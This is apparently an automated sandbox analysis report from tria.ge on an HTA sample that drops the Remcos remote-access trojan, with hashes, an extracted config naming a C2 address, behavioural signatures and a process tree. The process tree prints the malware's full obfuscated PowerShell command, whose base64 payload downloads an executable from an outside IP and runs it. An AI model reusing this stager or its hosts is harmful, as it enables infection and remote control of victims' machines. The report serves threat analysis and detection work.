Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16/12/2024, 16:22
Behavioral task
behavioral1
Sample
crreatedbestthingswithgreatattitudeneedforthat.hta
Resource
win7-20240903-en
General
-
Target
crreatedbestthingswithgreatattitudeneedforthat.hta
-
Size
142KB
-
MD5
22ca9f87ffb6d9d3dc9d7e4f151470c7
-
SHA1
df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
-
SHA256
6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
-
SHA512
e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
-
SSDEEP
768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn
Malware Config
Extracted
remcos
elvis
107.173.4.16:2560
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GJDISH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2636 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2636 powershell.exe 2076 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3028 nicetomeetyousweeet.exe -
Loads dropped DLL 4 IoCs
pid Process 2636 powershell.exe 2636 powershell.exe 2636 powershell.exe 2636 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nicetomeetyousweeet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1688 wrote to memory of 2076 1688 mshta.exe 28 PID 1688 wrote to memory of 2076 1688 mshta.exe 28 PID 1688 wrote to memory of 2076 1688 mshta.exe 28 PID 1688 wrote to memory of 2076 1688 mshta.exe 28 PID 2076 wrote to memory of 2636 2076 cmd.exe 30 PID 2076 wrote to memory of 2636 2076 cmd.exe 30 PID 2076 wrote to memory of 2636 2076 cmd.exe 30 PID 2076 wrote to memory of 2636 2076 cmd.exe 30 PID 2636 wrote to memory of 2644 2636 powershell.exe 31 PID 2636 wrote to memory of 2644 2636 powershell.exe 31 PID 2636 wrote to memory of 2644 2636 powershell.exe 31 PID 2636 wrote to memory of 2644 2636 powershell.exe 31 PID 2644 wrote to memory of 2080 2644 csc.exe 32 PID 2644 wrote to memory of 2080 2644 csc.exe 32 PID 2644 wrote to memory of 2080 2644 csc.exe 32 PID 2644 wrote to memory of 2080 2644 csc.exe 32 PID 2636 wrote to memory of 3028 2636 powershell.exe 34 PID 2636 wrote to memory of 3028 2636 powershell.exe 34 PID 2636 wrote to memory of 3028 2636 powershell.exe 34 PID 2636 wrote to memory of 3028 2636 powershell.exe 34
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2080
-
-
-
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3028
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5231bd52dc7439bba251272cae3e4d318
SHA1641a9acb586866345f751d5c904d5e2aac153de1
SHA2564a9ea347c34633b51985bc581815a85e2b031a7dc5a5c50d452faaa5f9440160
SHA51282fc959401195037c4a72cb1ad2c6602b08b101d70b6890db8cad16f526bcc7e7c6b31b2b78535e35ee4345ab31bcf377a561436ed1183a3f86ffbcf41d223e9
-
Filesize
3KB
MD55f23f7054f66283c49b88b714229dc93
SHA1226d34bec9d07d9ab433f120c4ab4e97d616cd77
SHA256a560600f8d8f127957ea89bcfa198eb6c6d9236a763f68bb39269823c399a131
SHA512ca73e9b90e6cb2c70d9c1ee8728248f38906c0bc0eb1c1221f2574cb50ffb2558e75a8e2ea3d38659fb74c29fd644523c04c677be22ed5867cb2e86ed31d160f
-
Filesize
7KB
MD5965f859617328356306a3bf742547ffb
SHA194b997dfed717a10e74ee891c0e38b6852e818e9
SHA25658db4bfbe05f7acd1960c1c13689078372b9af50fde24c3568b3a075df139c42
SHA512d0ebdd2e00910a4aaea31f576266a7059947cc768eb57b3b780d0e8bba2e91d1c6f12fbb6f642cb1e6db452b049e1adab18f03163c6ac5f35b2e8bf0d324c4ec
-
Filesize
652B
MD53fdcc3672039aa7b981410f10cfb6cf2
SHA1c13d238dc1ffcb42647a27aada00ee073a10f166
SHA256d1aff747b863248fe591ad8a6c812e215622c3192312e8c248fd37e1f0f99520
SHA5127aa58b027843b4f28852a2c8c8f38a14d854c5cb82e0b290b638e48b3538aa6118644c59c597ea4d29f8ac0ec54619c30d2047f305eeab7a41c9017c32185dc0
-
Filesize
478B
MD580c03b4485808d996cc8226157f377a7
SHA17cc7e02b84232b1523c555a349c86fc059a98eff
SHA256240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d
SHA512ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c
-
Filesize
309B
MD52eb5f5af0f3121c90a4d13fcf04181a6
SHA1a1bf83f3026d48261c366a1ed906c77e076ab7cd
SHA256bcd172a6ba8c3bb4662fd968f97a9b40062abb79e27c8a0a5763bd7c1e2f2c3c
SHA51280433c3651c0314ce9fe92954cb540764ade1ad1e595595150578e9e3b511e239907744ef503421bcc18d0c4afa4ad3a650249f55731ed7bc23195743dbecd41
-
Filesize
528KB
MD5a2d03c5333bfecca62720cd6ee3a4dc4
SHA1ce4c380f2748f375904c17b38d4f93e294fef4f6
SHA256ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e
SHA5125c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c